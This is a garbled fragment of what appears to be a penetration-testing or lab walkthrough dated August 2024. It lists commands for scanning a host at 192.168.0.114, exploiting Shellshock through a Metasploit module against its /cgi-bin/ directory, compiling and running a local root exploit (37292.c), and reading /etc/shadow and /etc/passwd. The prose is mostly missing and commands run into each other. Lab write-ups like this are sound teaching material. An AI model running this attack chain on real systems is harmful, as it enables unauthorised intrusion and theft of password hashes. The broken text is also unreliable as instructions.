Aug 5, 2024
Purpose of Scanning
Post-Exploitation
Initial Scanning Steps
nmap -sV -O 192.168.0.114
dirb http://192.168.0.114/
/cgi-bin/
directory.sudo msfconsole
search shellshock
).exploit multi/http/apigee_mod_cgi_bash_env_exec
.whoami
and checking directory permissions.gcc 37292.c -o ofs
./ofs
cat /etc/shadow
and cat /etc/passwd
to retrieve info.